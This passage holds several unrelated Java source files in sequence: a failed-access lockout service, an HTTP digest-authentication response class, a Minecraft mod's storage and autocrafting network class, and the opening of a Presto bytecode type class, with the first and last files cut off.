removedFailedEntriesTotalSize; } @Override public PageDto getFailedAccessEntries(final PageRequestDto request) { final PageRequest pageRequest = request == null ? new PageRequestDto() : request; //@formatter:off final Long totalSize = failedAccessDao.count(pageRequest.getQuery()); final List<? extends FailedAccess> entities = failedAccessDao .find(pageRequest.getQuery(), pageRequest.getFirstResult(), pageRequest.getPageSize(), pageRequest.getComparatorItem()); //@formatter:on final Page<? extends FailedAccess> page = pageBuilder.buildPage(entities, pageRequest, totalSize); return PageBuilderUtils.createPageDto( page, (PageEntryTransformer<FailedAccessDto, FailedAccess>) FailedAccessDto::new); } private FailedAccessDto createFailedAccessDto(final FailedAccess source) { return source == null ? null : new FailedAccessDto(source); } @Override public FailedAccessDto getFailedAccessEntry(final Serializable id) { Validate.notNull(id, "ID must not be null."); final FailedAccess entity = failedAccessDao.getById(id); final FailedAccessDto dto = createFailedAccessDto(entity); if (log.isDebugEnabled()) { log.debug("Returning failed access DTO with ID [" + id + "]: " + dto); } return dto; } @Override public FailedAccessDto getFailedAccessEntry(final String resourceId, final String remoteHost) { FailedAccess entity = failedAccessDao.getByResourceIdAndRemoteHost(resourceId, remoteHost); final FailedAccessDto dto = createFailedAccessDto(entity); if (log.isDebugEnabled()) { log.debug("Returning failed access DTO with resource ID [" + resourceId + "] and remote host [" + remoteHost + "]: " + dto); } return dto; } @Override public BooleanDto removeFailedAccessEntry(String resourceId, String remoteHost) { boolean value = failedAccessDao.removeByResourceIdAndRemoteHost(resourceId, remoteHost); if (value) { removedFailedEntriesTotalSize = removedFailedEntriesTotalSize + 1L; } return new BooleanDto(value); } @Override public void removeObsoleteFailedAccessEntries() { if (removingRunnning) { return; } try { removingRunnning = true; lastRemovingOfFailedEntries = System.currentTimeMillis(); int size = 0; List<? extends FailedAccess> entities = failedAccessDao.findObsolete(removeFailedAccessEntriesAfterMillis); Iterator<? extends FailedAccess> entityIterator = entities.iterator(); while (entityIterator.hasNext()) { // NOSONAR FailedAccess entity = entityIterator.next(); entityIterator.remove(); removeFailedAccessEntry(entity.getResourceId(), entity.getRemoteHost()); size = size + 1; } lastRemovingOfFailedEntriesSize = size; lastRemovingOfFailedEntriesDuration = System.currentTimeMillis() - lastRemovingOfFailedEntries; } finally { removingRunnning = false; } } @Override public AccessResultDto accessSucceeded(String resourceId, String remoteHost, Long timeInMillis) { Date modificationDate = timeInMillis == null || timeInMillis <= 0 ? new Date() : new Date(timeInMillis); FailedAccess entity = failedAccessDao.getByResourceIdAndRemoteHost(resourceId, remoteHost); boolean accessGranted = isAccessGranted(entity); AccessResultDto result = new AccessResultDto(accessGranted, modificationDate.getTime(), calculateAccessDeniedUntil(entity)); if (accessGranted) { result.setCounter(0); if (entity != null) { failedAccessDao.removeById(entity.getId()); } } else { result.setCounter(entity.getCounter()); } result.setCounterThreshold(getFailedAccessCounterThreshold()); return result; } @Override public AccessResultDto accessFailed(String resourceId, String remoteHost, Long timeInMillis) { Date modificationDate = timeInMillis == null || timeInMillis <= 0 ? new Date() : new Date(timeInMillis); FailedAccess entity = failedAccessDao.getByResourceIdAndRemoteHost(resourceId, remoteHost); FailedAccessDto dto; if (entity == null) { dto = new FailedAccessDto(); dto.setCounter(1); dto.setCreationDate(modificationDate); dto.setModificationDate(modificationDate); dto.setRemoteHost(remoteHost); dto.setResourceId(resourceId); } else { dto = new FailedAccessDto(entity); dto.setModificationDate(modificationDate); dto.setCounter(dto.getCounter() + 1); } entity = failedAccessDao.save(dto); boolean accessGranted = isAccessGranted(entity); AccessResultDto result = new AccessResultDto(accessGranted, modificationDate.getTime(), calculateAccessDeniedUntil(dto)); result.setCounter(entity.getCounter()); // NOSONAR result.setCounterThreshold(getFailedAccessCounterThreshold()); return result; } @Override public AccessResultDto isAccessGranted(String resourceId, String remoteHost) { FailedAccess entity = failedAccessDao.getByResourceIdAndRemoteHost(resourceId, remoteHost); long timestamp = entity != null ? entity.getModificationDate().getTime() : System.currentTimeMillis(); boolean accessGranted = isAccessGranted(entity); AccessResultDto dto = new AccessResultDto(accessGranted, timestamp, calculateAccessDeniedUntil(entity)); if (log.isDebugEnabled()) { log.debug("Is access granted [resource ID = " + resourceId + ", remote host = " + remoteHost + "]? " + dto); } return dto; } }
/* * Copyright 2010 Bruno de Carvalho * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /* * Copyright (c) 2009 WIT Software. All rights reserved. * * WIT Software Confidential and Proprietary information. It is strictly forbidden for 3rd parties to modify, decompile, * disassemble, defeat, disable or circumvent any protection mechanism; to sell, license, lease, rent, redistribute or * make accessible to any third party, whether for profit or without charge. * * carvalho 2009/06/03 */ package com.biasedbit.hotpotato.util.digest; import java.text.ParseException; import java.util.Collections; import java.util.HashMap; import java.util.Map; /** * Digest authentication challenge response. * * @author <a href="http://bruno.biasedbit.com/">Bruno de Carvalho</a> */ public class DigestAuthChallengeResponse { // internal vars -------------------------------------------------------------------------------------------------- private final Map<String, String> properties; // constructors --------------------------------------------------------------------------------------------------- public DigestAuthChallengeResponse(Map<String, String> properties) { this.properties = properties; } public DigestAuthChallengeResponse() { this.properties = new HashMap<String, String>(); } // public static methods ------------------------------------------------------------------------------------------ public static DigestAuthChallengeResponse createFromHeader(String header) throws ParseException { return new DigestAuthChallengeResponse(DigestUtils.parseHeader(header)); } public static boolean validateHeaderContent(DigestAuthChallengeResponse response) { return ((response.properties.get(DigestUtils.SCHEME) != null) && (response.properties.get(DigestUtils.RESPONSE) != null) && (response.properties.get(DigestUtils.NONCE) == null) && (response.properties.get(DigestUtils.USERNAME) == null) && (response.properties.get(DigestUtils.URI) != null)); } // public methods ------------------------------------------------------------------------------------------------- public String buildAsString() { StringBuilder builder = new StringBuilder(); builder.append(this.getScheme()) .append(" username=\"").append((this.getUsername())) .append("\", nonce=\"").append(this.getNonce()) .append("\", uri=\"").append(this.getUri()) .append("\", response=\"").append(this.getResponse()).append('\"'); String tmp = this.getRealm(); if (tmp != null) { builder.append(", realm=\"").append(tmp).append('\"'); } tmp = this.getAlgorithm(); if (tmp != null) { builder.append(", algorithm=").append(tmp); } tmp = this.getQop(); if (tmp != null) { builder.append(", qop=").append(tmp) .append(", cnonce=\"").append(this.getCnonce()) .append("\", nc=").append(this.getNonceCount()); } tmp = this.getOpaque(); if (tmp != null) { builder.append(", opaque=\"").append(tmp).append("\""); } return builder.toString(); } public String getProperty(String key) { return this.properties.get(key); } public void setProperty(String key, String value) { this.properties.put(key, value); } // getters & setters ---------------------------------------------------------------------------------------------- public String getScheme() { return this.properties.get(DigestUtils.SCHEME); } public void setScheme(String scheme) { this.properties.put(DigestUtils.SCHEME, scheme); } public String getResponse() { return this.properties.get(DigestUtils.RESPONSE); } public void setResponse(String response) { this.properties.put(DigestUtils.RESPONSE, response); } public String getRealm() { return this.properties.get(DigestUtils.REALM); } public void setRealm(String realm) { this.properties.put(DigestUtils.REALM, realm); } public String getNonce() { return this.properties.get(DigestUtils.NONCE); } public void setNonce(String nonce) { this.properties.put(DigestUtils.NONCE, nonce); } public String getAlgorithm() { return this.properties.get(DigestUtils.ALGORITHM); } public void setAlgorithm(String algorithm) { this.properties.put(DigestUtils.ALGORITHM, algorithm); } public String getUsername() { return this.properties.get(DigestUtils.USERNAME); } public void setUsername(String username) { this.properties.put(DigestUtils.USERNAME, username); } public String getUri() { return this.properties.get(DigestUtils.URI); } public void setUri(String uri) { this.properties.put(DigestUtils.URI, uri); } public String getQop() { return this.properties.get(DigestUtils.QOP); } public void setQop(String qop) { this.properties.put(DigestUtils.QOP, qop); } public String getNonceCount() { return this.properties.get(DigestUtils.NONCE_COUNT); } public void setNonceCount(int nonceCount) { this.properties.put(DigestUtils.NONCE_COUNT, DigestUtils.toNonceCount(nonceCount)); } public String getCnonce() { return this.properties.get(DigestUtils.CLIENT_NONCE); } public void setCnonce(String cnonce) { this.properties.put(DigestUtils.CLIENT_NONCE, cnonce); } public String getOpaque() { return this.properties.get(DigestUtils.OPAQUE); } public void setOpaque(String opaque) { this.properties.put(DigestUtils.OPAQUE, opaque); } public Map<String, String> getProperties() { return Collections.unmodifiableMap(this.properties); } // low level overrides -------------------------------------------------------------------------------------------- @Override public String toString() { return new StringBuilder() .append("DigestAuthChallengeResponse{") .append("properties=").append(this.properties) .append('}').toString(); } }
package com.tom.storage.handler; import java.util.ArrayList; import java.util.Collections; import java.util.HashMap; import java.util.List; import java.util.Map; import net.minecraft.entity.player.EntityPlayer; import net.minecraft.nbt.NBTTagCompound; import net.minecraft.util.math.BlockPos; import net.minecraft.util.math.MathHelper; import net.minecraft.util.text.ITextComponent; import net.minecraft.util.text.Style; import net.minecraft.util.text.TextComponentTranslation; import net.minecraft.util.text.TextFormatting; import com.tom.api.grid.StorageNetworkGrid; import com.tom.api.grid.StorageNetworkGrid.IControllerTile; import com.tom.api.grid.StorageNetworkGrid.ICraftingController; import com.tom.api.grid.StorageNetworkGrid.IDevice; import com.tom.api.grid.StorageNetworkGrid.IGridEnergyStorage; import com.tom.api.grid.StorageNetworkGrid.IGridInputListener; import com.tom.api.grid.StorageNetworkGrid.IPowerDrain; import com.tom.api.inventory.IStorageInventory; import com.tom.lib.api.IValidationChecker; import com.tom.lib.api.energy.IEnergyStorage; import com.tom.lib.api.grid.IGridDevice; import com.tom.util.Storage; import com.tom.util.TMLogger; import com.tom.util.TomsModUtils; public class StorageData implements IEnergyStorage { public List<IStorageInventory> inventories = new ArrayList<>(); protected PowerCache powerCache; protected List<AutoCraftingHandler.ICraftingHandler<?>> craftingHandlerList = new ArrayList<>(); // protected Map<Location, AutoCraftingHandler.ICraftingHandler<?>> // craftingHandlerMap = new HashMap<>(); protected List<ICraftingController> craftingControllerList = new ArrayList<>(); protected List<IGridInputListener> inputListeners = new ArrayList<>(); public List<StorageNetworkGrid> grids = new ArrayList<>(); protected Map<String, Storage<StorageData>> networks = new HashMap<>(); // private StorageSystemProperties properties = new // DefaultStorageSystemProperties(); protected boolean isVPN = false, isRealVPN = false; // private int bootTime = 20; public StorageData() { powerCache = new PowerCache(); cache = CacheRegistry.createNetworkCache(this); } public Storage<StorageData> getVPN(String name) { return !isRealVPN ? networks.get(name) : null; } public Storage<StorageData> createPowerWrappedVPN(String nameIn, PowerCache power) { String name = "." + nameIn; if (networks.containsKey(name)) { return networks.get(name); } else { StorageData d = new StorageData(); d.isVPN = true; Storage<StorageData> s = new Storage<>(d); networks.put(name, s); return s; } } public IStorageInventory storageInv = new IStorageInventory() { @Override public <T extends ICraftable> T pushStack(T stack) { if (stack == null || !stack.hasQuantity()) return null; if (hasEnergy() && extractEnergy(0.1D, false) == 0.1D) { for (int i = 0;i < craftingControllerList.size();i++) { if (craftingControllerList.get(i) != null) { stack = craftingControllerList.get(i).onStackInput(stack); } else { TMLogger.bigWarn("Crafting Controller List Contains a ~~NULL~~ instance!!! This SHOULDN'T BE POSSIBLE!"); } if (stack == null) return null; } for (int i = 0;i < inputListeners.size();i++) { if (inputListeners.get(i) != null) { stack = inputListeners.get(i).onStackInput(stack); } else { TMLogger.bigWarn("Input Listener List Contains a ~~NULL~~ instance!!! This SHOULDN'T BE POSSIBLE!"); } if (stack == null) return null; } return pushStack0(stack); } else return stack; } private <T extends ICraftable> T pushStack0(T stack) { for (int i = 0;i < inventories.size();i++) { stack = inventories.get(i).pushStack(stack); if (stack == null || !stack.hasQuantity()) return null; } return stack; } @Override public <T extends ICraftable> T pullStack(T stack, long max) { if (hasEnergy()) { if (stack == null) return null; T retStack = null; for (int i = 0;i < inventories.size();i++) { List<T> stacks = inventories.get(i).getStacks(CacheRegistry.getCacheClassFor(stack)); for (int j = 0;j < stacks.size();j++) { if (stack.isEqual(stacks.get(j))) { // System.out.println("pull"); if (retStack == null) { long maxExtractable = Math.min(Math.min(stack.getQuantity(), max), stack.getMaxStackSize()); long stackSizeMultipier = 64 / stack.getMaxStackSize(); double energyExtracted = extractEnergy((stackSizeMultipier / 10D) * maxExtractable, true); double d1 = energyExtracted / (stackSizeMultipier / 10D); maxExtractable = Math.min(maxExtractable, MathHelper.floor(d1)); if (maxExtractable == 0) return null; extractEnergy(energyExtracted, false); retStack = inventories.get(i).pullStack(stack, maxExtractable); } else { long maxExtractable = Math.min(Math.min(stack.getQuantity(), max), stack.getMaxStackSize()) - retStack.getQuantity(); long stackSizeMultipier = 64 / stack.getMaxStackSize(); double energyExtracted = extractEnergy((stackSizeMultipier / 10D) * maxExtractable, true); double d1 = energyExtracted / (stackSizeMultipier / 10D); maxExtractable = Math.min(maxExtractable, MathHelper.floor(d1)); if (maxExtractable == 0) return null; extractEnergy(energyExtracted, false); T c = inventories.get(i).pullStack(stack, maxExtractable); if (c != null) retStack.add(c); } if (retStack != null && retStack.getQuantity() == Math.min(Math.min(stack.getQuantity(), max), stack.getMaxStackSize())) return retStack; } } } return retStack; } else return null; } @Override public int getPriority() { return 0; } @SuppressWarnings("unchecked") @Override public <T extends ICraftable, C extends ICache<T>> List<T> getStacks(Class<C> cache) { List<T> list = new ArrayList<>(); if (hasEnergy()) { for (int i = 0;i < inventories.size();i++) { IStorageInventory inv = inventories.get(i); List<T> stacks = inv.getStacks(cache); for (int j = 0;j < stacks.size();j++) { T stack = stacks.get(j); if (stack != null) { stack = (T) stack.copy(); boolean added = false; for (int k = 0;k < list.size();k++) { if (list.get(k).equals(stack)) { list.get(k).add(stack); added = true; break; } } if (!added) list.add(stack); } } } } // list.sort(comparator); return list; } @SuppressWarnings("unchecked") @Override public <T extends ICraftable, C extends ICache<T>> List<T> getCraftableStacks(Class<C> cache) { List<T> list = new ArrayList<>(); if (hasEnergy()) { for (int i = 0;i < craftingHandlerList.size();i++) { AutoCraftingHandler.ICraftingHandler<?> handler = craftingHandlerList.get(i); if (handler.getCraftableCacheClass() == cache) { AutoCraftingHandler.ICraftingHandler<T> handler2 = (AutoCraftingHandler.ICraftingHandler<T>) handler; List<AutoCraftingHandler.ICraftingRecipe<T>> recipes = handler2.getRecipes(); for (int j = 0;j < recipes.size();j++) { List<T> outputStacks = recipes.get(j).getOutputs(); for (int k = 0;k < outputStacks.size();k++) { T ss = outputStacks.get(k); if (ss != null) { boolean found = false; ss = (T) ss.copy(); for (int l = 0;l < list.size();l++) { T stack = list.get(l); if (stack.isEqual(ss)) { found = true; break; } } if (!found) list.add((T) ss.copy()); } } } } } } return list; } @Override public StorageNetworkGrid getGrid() { return null; } @Override public long getStorageValue() { return inventories.stream().mapToLong(IStorageInventory::getStorageValue).sum(); } boolean valid = true; @Override public void saveAndInvalidate() { save(); valid = false; } @Override public boolean isValid() { return valid; } }; private NetworkCache cache; public List<IGridDevice<?>> devices = new ArrayList<>(); public List<IPowerDrain> powerDrain = new ArrayList<>(); public List<IDevice> channelDevices = new ArrayList<>(); public List<IControllerTile> controllers = new ArrayList<>(); public NetworkState networkState = NetworkState.ACTIVE; public void writeToNBT(NBTTagCompound tag) { powerCache.writeToNBT(tag); } public void readFromNBT(NBTTagCompound tag) { powerCache.readFromNBT(tag); } public void addInventory(IStorageInventory inventory) { if (!inventories.contains(inventory)) { inventories.add(inventory); Collections.sort(inventories, com.tom.api.grid.StorageNetworkGrid.PRIORITY_COMP); } } /*@Override public int getSizeInventory() { int size = 0; for(int i = 0;i<inventories.size();i++){ size += inventories.get(i).getSizeInventory(); } return size; } @Override public ItemStack getStackInSlot(int index) { int currentS = 0; for(int i = 0;i<inventories.size();i++){ if(currentS <= index && (currentS + inventories.get(i).getSizeInventory()) > index){ return inventories.get(i).getStackInSlot(index - currentS); }else{ currentS += inventories.get(i).getSizeInventory(); } } return null; } @Override public ItemStack decrStackSize(int index, int count) { int currentS = 0; for(int i = 0;i<inventories.size();i++){ if(currentS <= index && (currentS + inventories.get(i).getSizeInventory()) > index){ return inventories.get(i).decrStackSize(index - currentS, count); }else{ currentS += inventories.get(i).getSizeInventory(); } } return null; } @Override public ItemStack removeStackFromSlot(int index) { int currentS = 0; for(int i = 0;i<inventories.size();i++){ if(currentS <= index && (currentS + inventories.get(i).getSizeInventory()) > index){ return inventories.get(i).removeStackFromSlot(index - currentS); }else{ currentS += inventories.get(i).getSizeInventory(); } } return null; } @Override public void setInventorySlotContents(int index, ItemStack stack) { int currentS = 0; for(int i = 0;i<inventories.size();i++){ if(currentS <= index && (currentS + inventories.get(i).getSizeInventory()) > index){ inventories.get(i).setInventorySlotContents(index - currentS, stack); return; }else{ currentS += inventories.get(i).getSizeInventory(); } } } @Override public void markDirty() { for(int i = 0;i<inventories.size();i++){ inventories.get(i).markDirty(); } } @Override public void openInventory(EntityPlayer player) { for(int i = 0;i<inventories.size();i++){ inventories.get(i).openInventory(player); } } @Override public void closeInventory(EntityPlayer player) { for(int i = 0;i<inventories.size();i++){ inventories.get(i).closeInventory(player); } } @Override public void clear() { for(int i = 0;i<inventories.size();i++){ inventories.get(i).clear(); } } @Override public String getName() { return ""; } @Override public boolean hasCustomName() { return false; } @Override public ITextComponent getDisplayName() { return null; } @Override public int getInventoryStackLimit() { return 64; } @Override public boolean isUseableByPlayer(EntityPlayer player) { return true; } @Override public boolean isItemValidForSlot(int index, ItemStack stack) { int currentS = 0; for(int i = 0;i<inventories.size();i++){ if(currentS <= index && (currentS + inventories.get(i).getSizeInventory()) > index){ return inventories.get(i).isItemValidForSlot(i, stack); }else{ currentS += inventories.get(i).getSizeInventory(); } } return false; } @Override public int getField(int id) { return 0; } @Override public void setField(int id, int value) { } @Override public int getFieldCount() { return 0; }*/ public void removeInventory(IStorageInventory inventory) { if (inventories.contains(inventory)) { inventories.remove(inventory); Collections.sort(inventories, com.tom.api.grid.StorageNetworkGrid.PRIORITY_COMP); } } public void addCraftingHandler(AutoCraftingHandler.ICraftingHandler<? extends ICraftable> data) { if (!craftingHandlerList.contains(data)) { craftingHandlerList.add(data); // craftingHandlerMap.put(new Location(data.getPos2(), // data.getDim(), data.getExtraData()), data); Collections.sort(craftingHandlerList, com.tom.api.grid.StorageNetworkGrid.PRIORITY_COMP); } } public void removeCraftingHandler(AutoCraftingHandler.ICraftingHandler<? extends ICraftable> data) { if (craftingHandlerList.contains(data)) { craftingHandlerList.remove(data); // craftingHandlerMap.remove(new Location(data.getPos2(), // data.getDim(), data.getExtraData())); Collections.sort(craftingHandlerList, com.tom.api.grid.StorageNetworkGrid.PRIORITY_COMP); } } public AutoCraftingHandler.CalculatedCrafting calculateCrafting(ICraftable stackToCraft) throws AutoCraftingHandler.TooComplexCraftingException { List<AutoCraftingHandler.ICraftingRecipe<? extends ICraftable>> recipes = new ArrayList<>(); for (int i = 0;i < craftingHandlerList.size();i++) { recipes.addAll(craftingHandlerList.get(i).getRecipes()); } /*List<ItemStack> storedStacks = new ArrayList<ItemStack>(); for(int i = 0;i<inventories.size();i++){ IStorageInv inv = inventories.get(i); for(int j = 0;j<inv.getSizeInventory();j++){ ItemStack stack = inv.getStackInSlot(j); if(stack != null){ storedStacks.add(stack); } } }*/ return AutoCraftingHandler.calculateCrafting(recipes, stackToCraft, cache.createStored()); } public void addCraftingController(ICraftingController data) { if (!craftingControllerList.contains(data)) { craftingControllerList.add(data); } // addInputListener(data); } public void removeCraftingController(ICraftingController data) { if (craftingControllerList.contains(data)) { craftingControllerList.remove(data); } // removeInputListener(data); } public void addInputListener(IGridInputListener data) { if (!inputListeners.contains(data)) { inputListeners.add(data); } } public void removeInputListener(ICraftingController data) { if (inputListeners.contains(data)) { inputListeners.remove(data); } } public void queueCrafting(ICraftable stackToCraft, EntityPlayer queuedBy, int cpuId) { try { AutoCraftingHandler.CalculatedCrafting crafting = calculateCrafting(stackToCraft); // List<StoredItemStack> storedStacks = storageInv.getStacks(); boolean containsAll = true; List<ICraftable> missingStacks = new ArrayList<>(); NetworkCache cache = this.cache.createStored(); /*for(int i = 0;i<crafting.requiredStacks.size();i++){ ItemStack stack = crafting.requiredStacks.get(i); StoredItemStack storedStack = new StoredItemStack(stack, stack.stackSize); if(!storedStacks.contains(new StoredItemStackComparator(storedStack))){ containsAll = false; if(missingStacks.contains(storedStack)){ for(int j = 0;j<missingStacks.size();j++){ StoredItemStack s = missingStacks.get(j); if(s.equals(storedStack)){ s.itemCount += storedStack.itemCount; break; } } }else{ missingStacks.add(storedStack); } } }*/ for (int i = 0;i < crafting.requiredStacks.size();i++) { ICraftable stack = crafting.requiredStacks.get(i); // StoredItemStack storedStack = new StoredItemStack(stack, // stack.stackSize); /*boolean stackFound = false; for(int j = 0;j<storedStacks.size();j++){ StoredItemStack storedStack = storedStacks.get(j); if(TomsModUtils.areItemStacksEqualOreDict(stack, storedStack.stack, true, true, false, true)){ stackFound = true; if(storedStack.itemCount < stack.stackSize){ ItemStack copiedStack = stack.copy(); int found = Math.min(storedStack.itemCount, stack.stackSize); storedStack.itemCount -= found; stack.stackSize = found; copiedStack.stackSize -= found; if(copiedStack.stackSize < 1){ crafting.requiredStacks.remove(i); copiedStack = null; } if(storedStack.itemCount < 1){ storedStacks.remove(j); } if(copiedStack != null){ ItemStack s = copiedStack.copy(); s.stackSize = 1; StoredItemStack storedS = new StoredItemStack(s, copiedStack.stackSize); if(missingStacks.contains(storedS)){ for(int k = 0;k<missingStacks.size();k++){ StoredItemStack mStack = missingStacks.get(k); if(mStack.equals(storedS)){ mStack.itemCount += storedS.itemCount; break; } } }else{ missingStacks.add(storedS); } } }else break; } } if(!stackFound){ ItemStack s = stack.copy(); s.stackSize = 1; StoredItemStack storedS = new StoredItemStack(s, stack.stackSize); if(missingStacks.contains(storedS)){ for(int k = 0;k<missingStacks.size();k++){ StoredItemStack mStack = missingStacks.get(k); if(mStack.equals(storedS)){ mStack.itemCount += storedS.itemCount; break; } } }else{ missingStacks.add(storedS); } crafting.requiredStacks.remove(stack); }*/ stack.checkIfIngredientsAreAvailable(cache, missingStacks, crafting); /*if(!storedStacks.contains(new StoredItemStackComparator(storedStack))){ //containsAll = false; if(missingStacks.contains(storedStack)){ for(int j = 0;j<missingStacks.size();j++){ StoredItemStack s = missingStacks.get(j); if(s.equals(storedStack)){ s.itemCount += storedStack.itemCount; break; } } }else{ missingStacks.add(storedStack); } crafting.requiredStacks.remove(i); }*/ } if (crafting.recipesToCraft.isEmpty() || !containsAll || !missingStacks.isEmpty()) { if (queuedBy != null) TomsModUtils.sendNoSpamTranslate(queuedBy, new Style().setColor(TextFormatting.RED), "tomsMod.chat.craftFail", new TextComponentTranslation("tomsMod.missingItems")); return; } if (queuedBy != null) crafting.queuedBy = queuedBy.getName(); for (int i = 0;i < craftingControllerList.size();i++) { ICraftingController cont = craftingControllerList.get(i); int maxMemory = cont.getMaxMemory(); if (!cont.hasJob() && ((maxMemory >= crafting.memorySize && cont.getMaxOperations() >= crafting.operationCount) || maxMemory == -1)) { cont.queueCrafing(crafting); int secTime = MathHelper.ceil(crafting.time / 20D); ITextComponent c = crafting.mainStack.serializeTextComponent(TextFormatting.GREEN); if (queuedBy != null) TomsModUtils.sendChatTranslate(queuedBy, new Style().setColor(TextFormatting.GREEN), "tomsMod.chat.craftingStarted", c, secTime / 60, secTime % 60); return; } } if (queuedBy != null) TomsModUtils.sendNoSpamTranslate(queuedBy, new Style().setColor(TextFormatting.RED), "tomsMod.chat.craftFail", new TextComponentTranslation("tomsMod.notEnoughCPUsOrMemory")); } catch (Throwable e) { if (queuedBy != null) TomsModUtils.sendNoSpamTranslate(queuedBy, new Style().setColor(TextFormatting.RED), "tomsMod.chat.craftFail", new TextComponentTranslation(e.getMessage())); } } // public void update(){ // if(bootTime > 0)bootTime--; // if(bootTime < 0)bootTime = 0; // } public AutoCraftingHandler.CompiledCalculatedCrafting compileCalculatedCrafting(AutoCraftingHandler.CalculatedCrafting crafting) { AutoCraftingHandler.CompiledCalculatedCrafting c = new AutoCraftingHandler.CompiledCalculatedCrafting(); // NBTTagCompound tag = new NBTTagCompound(); // NBTTagList list = new NBTTagList(); for (int i = 0;i < craftingControllerList.size();i++) { ICraftingController cont = craftingControllerList.get(i); int maxMemory = cont.getMaxMemory(); if (!cont.hasJob() && ((maxMemory >= crafting.memorySize && cont.getMaxOperations() >= crafting.operationCount) || maxMemory == -1)) { // list.appendTag(new NBTTagInt(i)); short[] cpus = new short[c.cpus.length + 1]; System.arraycopy(c.cpus, 0, cpus, 0, c.cpus.length); cpus[c.cpus.length] = (short) i; c.cpus = cpus; } } NetworkCache cache = this.cache.createStored(); // tag.setTag("p", list); // List<StoredItemStack> storedStacks = storageInv.getStacks(); // boolean containsAll = true; List<ICraftable> missingStacks = new ArrayList<>(); for (int i = 0;i < crafting.requiredStacks.size();i++) { ICraftable stack = crafting.requiredStacks.get(i); // StoredItemStack storedStack = new StoredItemStack(stack, // stack.stackSize); stack.checkIfIngredientsAreAvailable(cache, missingStacks, crafting); /*if(!storedStacks.contains(new StoredItemStackComparator(storedStack))){ //containsAll = false; if(missingStacks.contains(storedStack)){ for(int j = 0;j<missingStacks.size();j++){ StoredItemStack s = missingStacks.get(j); if(s.equals(storedStack)){ s.itemCount += storedStack.itemCount; break; } } }else{ missingStacks.add(storedStack); } crafting.requiredStacks.remove(i); }*/ } crafting.writeToClientNBTPacket(c); // tag.setBoolean("ca", containsAll); // list = new NBTTagList(); List<ICraftable> missingStacksO = new ArrayList<>(); for (ICraftable s : missingStacks) { AutoCraftingHandler.addCraftableToList(s, missingStacksO); } for (ICraftable s : missingStacksO) { NBTTagCompound t = new NBTTagCompound(); // s.writeToNBT(t); CacheRegistry.writeToNBT(s, t); // list.appendTag(t); c.missingStacks.add(t); } // tag.setTag("mi", list); return c; } public int getCpuID(ICraftingController c) { for (int i = 0;i < craftingControllerList.size();i++) { ICraftingController o = craftingControllerList.get(i); if (o == c) { return i; } } return -1; } private int counter; public void update() { counter++; boolean outOfPower = !networkState.isPowered(); List<IPowerDrain> invalid = new ArrayList<>(); boolean foundInvalid = false; for (int i = 0;i < powerDrain.size();i++) { IPowerDrain dr = powerDrain.get(i); if (!dr.isValid()) { invalid.add(dr); foundInvalid = true; continue; } if (outOfPower) { dr.setActive(NetworkState.OFF); } else { double drain = dr.getPowerDrained(); double e = this.extractEnergy(drain, false); if (e == drain) { // powerDrain.get(i).setActive(networkState); } else { // powerDrain.get(i).setActive(NetworkState.OFF); outOfPower = true; } } } if (foundInvalid) powerDrain.removeAll(invalid); powerCache.setActive(!outOfPower); IValidationChecker.removeAllInvalid(inventories); if(counter % 5 == 0){ IValidationChecker.removeAllInvalid(craftingControllerList); IValidationChecker.removeAllInvalid(craftingHandlerList); IValidationChecker.removeAllInvalid(devices); IValidationChecker.removeAllInvalid(channelDevices); IValidationChecker.removeAllInvalid(controllers); IValidationChecker.removeAllInvalid(inputListeners); } } public void invalidate(StorageNetworkGrid grid) { grids.remove(grid); } public NetworkState isActive() { return networkState; } public void setActive(NetworkState state) { this.networkState = state; } public void addEnergyStorage(IGridEnergyStorage storage) { powerCache.addEnergyStorage(storage); } public void removeEnergyStorage(IGridEnergyStorage storage) { powerCache.removeEnergyStorage(storage); } @Override public double receiveEnergy(double maxReceive, boolean simulate) { return powerCache.receiveEnergy(maxReceive, simulate); } @Override public double extractEnergy(double maxExtract, boolean simulate) { return powerCache.extractEnergy(maxExtract, simulate); } @Override public double getEnergyStored() { return powerCache.getEnergyStored(); } @Override public long getMaxEnergyStored() { return powerCache.getMaxEnergyStored(); } @Override public boolean isFull() { return powerCache.isFull(); } @Override public boolean hasEnergy() { return powerCache.hasEnergy(); } @Override public double getMaxExtract() { return powerCache.getMaxExtract(); } @Override public double getMaxReceive() { return powerCache.getMaxReceive(); } public PowerCache getPowerCache() { return powerCache; } public void setPowerCache(PowerCache powerCache) { this.powerCache = powerCache; } public boolean isFullyActive() { return hasEnergy() && networkState.fullyActive(); } public boolean showChannels() { return hasEnergy() && networkState.showChannels(); } public BlockPos getSecurityStationPos() { return controllers.size() > 0 ? controllers.get(0).getSecurityStationPos() : null; } /*public ICraftingHandler<?> getCraftingHandler(BlockPos pos, int dim, int extra){ return craftingHandlerMap.get(new Location(pos, dim, extra)); }*/ }
/* * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.facebook.presto.byteCode; import com.google.common.base.Function; import com.google.common.base.Preconditions; import com.google.common.base.Predicate; import com.google.common.collect.ImmutableList; import org.objectweb.asm.Type; import javax.annotation.Nullable; import javax.annotation.concurrent.Immutable; import java.util.List; @Immutable public class ParameterizedType { public static ParameterizedType typeFromJavaClassName(String className) { Preconditions.checkNotNull(className, "type is null"); if (className.endsWith("/")) { Preconditions.checkArgument(!className.endsWith(";"), "Invalid class name %s", className); } return new ParameterizedType(className.replace('.', '/')); } public static ParameterizedType typeFromPathName(String className) { Preconditions.checkNotNull(className, "type is null"); if (className.indexOf(".") > 0) { Preconditions.checkArgument(!className.endsWith(";"), "Invalid class name %s", className); } return new ParameterizedType(className); } public static ParameterizedType type(Type type) { Preconditions.checkNotNull(type, "type is null"); return new ParameterizedType(type.getInternalName()); } public static ParameterizedType type(Class<?> type) { Preconditions.checkNotNull(type, "type is null"); return new ParameterizedType(type); } public static ParameterizedType type(Class<?> type, Class<?>... parameters) { Preconditions.checkNotNull(type, "type is null"); return new ParameterizedType(type, parameters); } public static ParameterizedType type(Class<?> type, ParameterizedType... 